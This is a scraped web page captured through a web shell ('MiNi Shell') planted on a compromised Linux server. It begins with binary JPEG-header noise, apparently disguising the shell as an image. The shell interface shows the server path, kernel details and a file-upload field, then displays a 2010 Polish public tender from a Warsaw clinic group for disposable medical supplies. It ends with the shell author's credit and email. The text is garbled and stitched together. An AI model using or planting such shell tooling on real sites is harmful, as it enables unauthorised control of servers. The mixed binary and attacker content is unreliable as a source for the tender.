JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/19758-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa  artykułów medycznych jednorazowego użytku w podziale na 10 części:
1) cz.1 : igły , strzykawki, przyrządy do infuzji, wenflony
2) cz. 2: rękawiczki 
3) cz.3: wata, gaza, lignina
4) cz.4: opaski dziane, elastyczne, gipsowe, przylepce, gaziki 
5) cz.5: materiały do sterylizacji 
6) cz.6: żel do aparatów  ekg i usg 
7) cz.7: szpatułki drewniane 
8) cz.8: papiery termoczułe do aparatów ekg, usg i laboratoryjnych oraz jednorazowe ustniki do spiromatru, gruszki, elektrody
9) cz.9: wzierniki uszne do otoskopów 
10) cz.10: pojemniki na odpady medyczne</b><br>
<b>Numer ogłoszenia: 19758 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa Wawer , ul. Strusia 4/8, 04-564 Warszawa, woj. mazowieckie, tel. 022 8120043, faks 022 8120796.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-wawer.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów medycznych jednorazowego użytku w podziale na 10 części:
1) cz.1 : igły , strzykawki, przyrządy do infuzji, wenflony
2) cz. 2: rękawiczki 
3) cz.3: wata, gaza, lignina
4) cz.4: opaski dziane, elastyczne, gipsowe, przylepce, gaziki 
5) cz.5: materiały do sterylizacji 
6) cz.6: żel do aparatów  ekg i usg 
7) cz.7: szpatułki drewniane 
8) cz.8: papiery termoczułe do aparatów ekg, usg i laboratoryjnych oraz jednorazowe ustniki do spiromatru, gruszki, elektrody
9) cz.9: wzierniki uszne do otoskopów 
10) cz.10: pojemniki na odpady medyczne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Dostawa  artykułów medycznych jednorazowego użytku w podziale na 10 części:
1) igły , strzykawki, przyrządy do infuzji, wenflony 
2) rękawiczki 
3) wata, gaza, lignina
4) opaski dziane, elastyczne, gipsowe, przylepce, gaziki 
5) materiały do sterylizacji 
6) żel do aparatów  ekg i usg 
7) szpatułki drewniane 
8) papiery termoczułe do aparatów ekg, usg i laboratoryjnych oraz jednorazowe 
    ustniki do spiromatru, gruszki, elektrody
9) wzierniki uszne do otoskopów 
10)pojemniki na odpady medyczne 

2. Szczegółowy opis przedmiotu zamówienia, w tym również  wielkości dostaw i ich rodzaje  przedstawiono w kosztorysach ofertowych (odpowiednio dla części), stanowiących załączniki 4.1 - 4.10  do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.13.10-6, 33.19.41.00-7, 33.14.14.20-0, 33.14.11.15-9, 33.14.11.14-2, 33.14.11.10-4, 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.18-0, 33.19.10.00-5, 33.14.00.00-3, 22.99.30.00-7, 34.92.84.80-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy (wykonawcy w rozumieniu art.2 ust. 11 ustawy p.z.p.):
1) którzy spełniają warunki określone w art. 22 ust.1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2007 r. Nr 223, poz. 1655 ze zm.) dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
    jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
b)  posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi
    do wykonania zamówienia,
d) sytuacji ekonomicznej i finansowej,
2) w stosunku do których , brak jest podstaw do wykluczenia z postępowania o udzielenie zamówienia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 i 2 ustawy P.Z.P.
Spełnienie ww. warunków oceniane będzie na podstawie dokumentów i oświadczeń 
wchodzących w skład oferty, określonych w punktach: 6.1.1, 6.1.2, 6.1.3, 6.1.4 SIWZ, według formuły spełnia / nie spełnia. 

3)  którzy wykażą, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują minimum 1 dostawę o podobnym charakterze. 

Za dostawę o podobnym charakterze uważa się: -w zakresie części 1,2,3,4,6,7,9,10 ogólnie rozumianą dostawę różnych wyrobów medycznych jednorazowego użytku, w tym: igieł, strzykawek, wenflonów, gazy, waty, opatrunków, pojemników,  itp., - w zakresie części 5 dostawę materiałów do sterylizacji, - w zakresie części 8 dostawę papierów termoczułych do urządzeń medycznych typu ultrasonograf, elektrokardiogram lub innych.
Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie opisu dostaw wykonanych przez wykonawcę i wymienionych w załączonym do oferty wykazie, określonym w pkt 6.1.5 SIWZ, sporządzonym wg wzoru stanowiącego odpowiedni dla części załącznik nr 6.1 - 6.10 do SIWZ, które winny co najmniej odpowiadać dostawom wskazanym powyżej oraz przedłożonych dokumentów potwierdzających, że ww. dostawy zostały wykonane lub są wykonywane należycie (np. referencje, opinie) - pkt. 6.1.6 SIWZ.
2. Wymagania dla przedmiotu zamówienia:
1) Przedmiot zamówienia  musi być dopuszczony do obrotu i używania na terenie RP, zgodnie z wymogami ustawy o wyrobach  medycznych z dnia 20 kwietnia 2004 r.    ( Dz. U. 2004 r., nr 93,  poz. 896 ze zm.)- dot. wyrobów medycznych.

2) Przedmiot zamówienia  musi spełniać warunki ( m.in. parametry techniczne, jakościowe, itp.) opisane przez Zamawiającego w kosztorysach ofertowych w kolumnie 2 - artykuł, opis.
Na potwierdzenie, że zaoferowane dostawy  odpowiadają wymaganiom określonym przez zamawiającego Wykonawca złoży wraz z ofertą dokumenty i próbki towaru. Rodzaj wymaganych dokumentów i próbek  został wymieniony szczegółowo dla poszczególnych części w kosztorysach ofertowych ( w zał. nr 4.1- 4.10 do SIWZ) oraz w pkt. 6.2 SIWZ.
Zamawiający przeanalizuje dokumenty dostarczone wraz z ofertą i oceni/sprawdzi na ich podstawie, czy zaproponowane wyroby są dopuszczone do obrotu i czy odpowiadają technicznym i jakościowym wymaganiom zamawiającego opisanym przez zamawiającego w kol. 2 kosztorysów ofertowych.

Ponadto od wykonawcy wymagane jest spełnienie i przyjęcie warunków określonych w SIWZ oraz wzorze umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy ubiegający się o niniejsze zamówienie złożą wraz z ofertą, w celu 
potwierdzenia spełnienia warunków udziału w postępowaniu niżej wymienione dokumenty:
1) Wypełnione i podpisane oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy p.z.p 
- wg wzoru stanowiącego załącznik nr 2 do SIWZ.
2) Wypełnione i podpisane oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania z powodów, o których mowa w art. 24 ust. 1 i 2 ustawy p.z.p. - wg wzoru stanowiącego załącznik 3 do SIWZ. 
3) Pełnomocnictwo dla reprezentanta wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy również spółek cywilnych)- jeżeli dotyczy.
Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, jeżeli nie wynika ono z odpisu z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej w formie oryginału lub kopii poświadczonej notarialnie - jeżeli dotyczy.
4) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Nie dotyczy osób fizycznych.
5) Wykaz wykonanych , a w przypadku dostaw okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie dostaw o podobnym charakterze, opracowany według wzoru stanowiącego załączniki od nr 6.1 do nr 6.10 do SIWZ - w zależności od części.
6) Dokumenty potwierdzające, iż dostawy wymienione w wykazie określonym w pozycji 6.1.5 SIWZ zostały wykonane lub są wykonywane należycie 
(np. referencje, opinie).
2. Wykonawcy ubiegający się o niniejsze zamówienie złożą wraz z ofertą, w celu 
potwierdzenia spełnienia przez oferowane dostawy wymagań określonych przez zamawiającego, niżej wymienione dokumenty:
1)  Dla części 1:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, próbki: igłę dowolnego rozmiaru, strzykawkę bez igły dowolnego rozmiaru, tuberkulinówkę, wenflon dowolnego koloru, przyrząd do przetaczania płynów infuzyjnych.

2) Dla części 2:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp.
3) Dla części 3:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp.
4) Dla części 4:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp.
5)  Dla części 5:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki, itp., próbki: 5-10 m rękawów - dotyczy pozycji 2,3,4 kosztorysu.
6) Dla części 6:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp.
7) Dla części 7:
deklaracja zgodności CE, opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp.
8) Dla części 8:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki, itp.
9) Dla części 9:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp.
10) Dla części 10:
dla wszystkich pozycji kosztorysu deklaracje zgodności CE, dla wszystkich pozycji kosztorysu opis producenta w formie ulotki, specyfikacji technicznej, karty charakterystyki itp., dla wszystkich pozycji kosztorysu opinia PZH,
dla wszystkich pozycji kosztorysu świadectwo jakości na odporność na przebicia.
3. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków- jeżeli dotyczy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-wawer.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPZLO W-wa Wawer  (pokój 303)
Ul. Strusia 4/8 ; 04-564  Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 10:00, miejsce: SZPZLO W-wa Wawer  (pokój 301)
Ul. Strusia 4/8 ; 04-564  Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com